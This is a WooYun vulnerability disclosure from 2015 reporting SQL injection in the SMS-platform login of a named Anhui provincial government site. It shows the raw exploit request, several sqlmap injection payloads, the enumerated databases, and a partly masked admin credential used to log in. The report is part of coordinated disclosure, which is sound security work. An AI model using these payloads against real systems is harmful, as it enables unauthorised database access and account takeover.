当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-092570

漏洞标题:安徽农网sql注射

相关厂商:安徽省农村综合经济信息中心

漏洞作者: 路人甲

提交时间:2015-01-20 09:57

修复时间:2015-03-06 09:58

公开时间:2015-03-06 09:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-20: 细节已通知厂商并且等待厂商处理中
2015-01-22: 厂商已经确认,细节仅向厂商公开
2015-02-01: 细节向核心白帽子及相关领域专家公开
2015-02-11: 细节向普通白帽子公开
2015-02-21: 细节向实习白帽子公开
2015-03-06: 细节向公众公开

简要描述:

安徽农网(http://www.ahnw.gov.cn/)短信平台登陆存在sql注射

详细说明:

http://www.ahnw.gov.cn/nwsms/

QQ图片20150118193419.png


QQ图片20150118193458.png


存在注入。

漏洞证明:

抓包。

POST /nwsms/check_user.asp HTTP/1.1
Host: www.ahnw.gov.cn
Proxy-Connection: keep-alive
Content-Length: 54
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.ahnw.gov.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.ahnw.gov.cn/nwsms/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: pgv_pvi=3620698112; ahnw_a1=3; _gscu_36441702=21559889a7v6ia16; ASPSESSIONIDASDCAAQR=LLNEFHLBNINFPPCOJMDIAEIE; Hm_lvt_14b56e9c821143e7ea1b1d0a6aac72b5=1421560469,1421563064,1421566755,1421575818; Hm_lpvt_14b56e9c821143e7ea1b1d0a6aac72b5=1421575818; bg%5Fuser=; name=%C5%A9%CD%F8%B9%DC%C0%ED%D4%B1; UserRight=1%2C2%2C3%2C4%2C0%2C5%2C6; SPID=1; PowerList=%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C34%2C36%2C37%2C1%2C2%2C6%2C40%2C41%2C42%2C44%2C45%2C46%2C47%2C10%2C11%2C12%2C43%2C9%2C3%2C38%2C39%2C999%2C; Smpp=8999; UID=1; Cmpp=8999; userId=admin
userId=*&pwd=1%27&imageField.x=0&imageField.y=0


sqlmap跑一跑

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: userId=' AND 1178=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(118)+
CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (1178=1178) THEN CHAR(49) ELSE CHAR(48) E
ND))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(107)+CHAR(113))) AND 'jNqc'='jNqc&pwd='&
imageField.x=44&imageField.y=12
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: userId=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,C
HAR(113)+CHAR(98)+CHAR(118)+CHAR(118)+CHAR(113)+CHAR(85)+CHAR(73)+CHAR(68)+CHAR(
112)+CHAR(71)+CHAR(107)+CHAR(111)+CHAR(99)+CHAR(78)+CHAR(97)+CHAR(113)+CHAR(107)
+CHAR(118)+CHAR(107)+CHAR(113)-- &pwd='&imageField.x=44&imageField.y=12
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: userId='; WAITFOR DELAY '0:0:5'--&pwd='&imageField.x=44&imageField.
y=12
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: userId=' WAITFOR DELAY '0:0:5'--&pwd='&imageField.x=44&imageField.y
=12
---
[19:37:09] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
[19:37:09] [INFO] fetching current user
current user:    'ahnw.sms'


[19:38:52] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
[19:38:52] [INFO] fetching database names
[19:38:52] [INFO] the SQL query used returns 168 entries
available databases [159]:


159个库。
账号
admin/ahnwj*****u
成功登陆。

QQ图片20150118194002.png

修复方案:

#1.过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-01-22 16:46

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给安徽分中心,由安徽分中心后续协调网站管理单位处置。

最新状态:

暂无